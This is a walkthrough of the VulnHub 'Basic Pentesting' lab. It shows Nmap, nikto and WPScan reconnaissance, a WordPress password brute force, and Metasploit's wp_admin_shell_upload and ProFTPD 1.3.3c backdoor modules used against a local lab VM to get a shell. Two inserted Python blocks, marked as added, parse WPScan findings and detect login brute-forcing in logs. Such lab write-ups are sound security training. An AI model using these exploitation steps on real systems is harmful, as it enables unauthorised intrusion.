VulnHub Basic Pentesting

Published on April 02, 2018

Good day to all.


Many of you know about pentesting; some have even done it, and some have only heard of it and would like to feel like a mini-specialist in this field. A long time ago, or maybe not so long ago, a lab dedicated to exactly that appeared on VulnHub.


ACT I - Setup


For this work I used Kali Linux, VirtualBox and, of course, the lab itself.
Now we need to connect the two machines. The simplest way: open cmd, go to the directory where VirtualBox is installed and set up the network with VBoxManage.


Commands to configure VBoxManage
cd C:\Program Files\Oracle\VirtualBox

C:\Program Files\Oracle\VirtualBox>VBoxManage.exe dhcpserver add --netname internet --ip 10.0.1.1 --netmask 255.255.255.0 --lowerip 10.0.1.2 --upperip 10.0.1.200 --enable


Now, in the network settings of both the Kali and the Basic Pentesting VMs, we select the network name we gave in cmd (internet).



ACT II - In the beginning


Check if Kali Linux sees our lab.



We see the connection on eth0. Now we need to find out the IP of the target machine. For this we will use the well-known Nmap.



The IP of our lab machine is 10.0.1.2.


ACT III - Basic Pentesting


After Nmap scanned our virtual network, we saw that 3 ports were open on the lab machine:


  • 21 - ftp
  • 22 - ssh
  • 80 - http

Let's try connecting to port 80. To do this, open a browser (in my case Firefox).



Fine! The site is working. Let's check which directories it hides from us. For this we will use the wonderful nikto program and look at the result.



OSVDB-3092: /secret/: This might be interesting

The secret directory should be interesting. Let's find out what it is hiding.



It looks like a 3 out of 10, of course, but that can all be fixed, in the name of beauty and convenience.


The most attentive have probably already guessed; nikto and Nmap hinted at it more than once:


 - Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>
 - Nmap scan report for vtcsec (10.0.1.2)

Let's add the name to /etc/hosts from the terminal:


# echo "10.0.1.2 vtcsec" >> /etc/hosts

Now we are ready to see the site in all its beauty.



Now, like a bloodhound, we go through all the directories of the site, poke at everything that can be poked and in the end find out that the site runs on WordPress. Yes, yes, nikto told us that already, but we are not looking for easy ways.


Let's use the WordPress vulnerability scanner WPScan:


# wpscan --url http://10.0.1.2/secret/

WPScan output

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_

[+] URL: http://10.0.1.2/secret/
[+] Started: Thu Mar 8 17:47:02 2018
[!] The WordPress 'http://10.0.1.2/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: http://vtcsec/secret/index.php/wp-json/; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.0.1.2/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.0.1.2/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.0.1.2/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number
[!] Title: WordPress 2.8.6-4.9 — Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 — RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 — HTML Language Attribute Escaping
Reference: https://wpvulndb.com/vulnerabilities/8968
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 — 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9.1 — MediaElement Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9006
Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/ticket/42720
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 — Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
[+] WordPress theme in use: twentyseventeen — v1.4
[+] Name: twentyseventeen — v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/
| Readme: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/style.css
| Referenced style.css: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a…
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection…
[+] No plugins found
[+] Finished: Thu Mar 8 17:47:06 2018
[+] Requests Done: 89
[+] Memory used: 37.828 MB
[+] Elapsed time: 00:00:03
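The findings block above is easy to triage by machine. As an added example (not part of the original post and not WPScan's own code), the following Python parses that text format into structured records and derives the lowest version that fixes every fixable finding; the sample input is an excerpt constructed from the output above.

```python
import re
from dataclasses import dataclass, field

# Excerpt constructed from the WPScan 2.9.3 output shown above.
SAMPLE = """\
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting
[!] 6 vulnerabilities identified from the version number
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
"""

@dataclass
class Finding:
    title: str
    references: list = field(default_factory=list)
    fixed_in: str = ""   # empty means WPScan reported no fixed version

    @property
    def cves(self):
        # Pull CVE ids out of the reference URLs
        return sorted({m for r in self.references
                       for m in re.findall(r"CVE-\d{4}-\d{4,}", r)})

def parse_wpscan(text):
    """Turn WPScan's '[!] Title / Reference / [i] Fixed in' lines into Finding objects."""
    version, findings = None, []
    for line in text.splitlines():
        line = line.strip()
        m_ver = re.match(r"\[\+\] WordPress version (\S+)", line)
        m_title = re.match(r"\[!\] Title: (.+)", line)
        m_ref = re.match(r"Reference: (\S+)", line)
        m_fix = re.match(r"\[i\] Fixed in: (\S+)", line)
        if m_ver:
            version = m_ver.group(1)
        elif m_title:
            findings.append(Finding(title=m_title.group(1)))
        elif m_ref and findings:
            findings[-1].references.append(m_ref.group(1))
        elif m_fix and findings:
            findings[-1].fixed_in = m_fix.group(1)
    return version, findings

def patch_plan(text):
    """Return (lowest version fixing every fixable finding, titles that have no fix)."""
    _, findings = parse_wpscan(text)
    fixes = [f.fixed_in for f in findings if f.fixed_in]
    target = max(fixes, key=lambda v: tuple(int(x) for x in v.split("."))) if fixes else None
    return target, [f.title for f in findings if not f.fixed_in]
```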


Hmmm, let's try to list all the usernames with the --enumerate u flag.


# wpscan --url http://10.0.1.2/secret/ --enumerate u


There is only one user, so we can try to guess the password.


# wpscan --url http://10.0.1.2/secret/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2


Unfortunately, our brute force was not successful, but we saw something interesting: an error for the login admin with the password admin.
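From the defender's side, a wordlist attack on wp-login.php like the one above is loud in the web server's access log. As an added example (not from the original post), this Python detector runs over constructed Apache combined-format log lines and flags an IP that POSTs to wp-login.php many times in a short window, noting whether a successful login (a 302 redirect) followed the failures.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log lines modelling a wordlist attack on the
# /secret/ WordPress login, followed later by one successful login from the same IP.
LOG = """\
10.0.1.3 - - [08/Mar/2018:17:50:01 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
10.0.1.3 - - [08/Mar/2018:17:50:01 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
10.0.1.3 - - [08/Mar/2018:17:50:02 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
10.0.1.3 - - [08/Mar/2018:17:50:02 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
10.0.1.3 - - [08/Mar/2018:17:50:03 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
10.0.1.3 - - [08/Mar/2018:17:55:40 +0000] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.1.7 - - [08/Mar/2018:17:51:00 +0000] "GET /secret/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.0.1.7 - - [08/Mar/2018:17:51:30 +0000] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse(text):
    """Yield (ip, timestamp, method, path, status) for each well-formed log line."""
    for raw in text.splitlines():
        m = LINE.match(raw)
        if m:
            ip, ts, method, path, status = m.groups()
            yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def detect(text, threshold=5, window_s=60):
    """Return {ip: info} for IPs with >= threshold failed wp-login POSTs inside
    window_s seconds. WordPress re-renders the form (200) on a bad password and
    answers 302 on success, so a 302 after the burst means the guessing worked."""
    attempts = defaultdict(list)
    for ip, ts, method, path, status in parse(text):
        if method == "POST" and path.endswith("/wp-login.php"):
            attempts[ip].append((ts, status))
    alerts = {}
    for ip, events in attempts.items():
        events.sort()
        fails = [t for t, s in events if s == 200]
        for i in range(len(fails) - threshold + 1):
            if (fails[i + threshold - 1] - fails[i]).total_seconds() <= window_s:
                success_after = any(s == 302 and t > fails[i] for t, s in events)
                alerts[ip] = {"attempts": len(fails), "success_after": success_after}
                break
    return alerts
```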


We'll have to try an exploit through Metasploit.


ACT IV - Admin is coming


First you need to configure Metasploit.


# /etc/init.d/postgresql start
# msfdb init

Let's get started!


# msfconsole

We need to find our exploit. Use the search command:


msf > search admin

From the list, wp_admin_shell_upload suits us.


We select it and set the options:


msf > use exploit/unix/webapp/wp_admin_shell_upload
msf > set username admin
msf > set password admin
msf > set rhost 10.0.1.2
msf > set targeturi /secret

It should be like this:



Launch!



Go to the browser and log in as admin / admin.



ACT V - I see backdoor


Now let's try to get a shell. For this we again need Metasploit.


msf > use exploit/unix/ftp/proftpd_133c_backdoor

Set the options:


msf > set rhost 10.0.1.2


Launch! (you can use exploit instead of run)



Tadaaam, we got access to the console.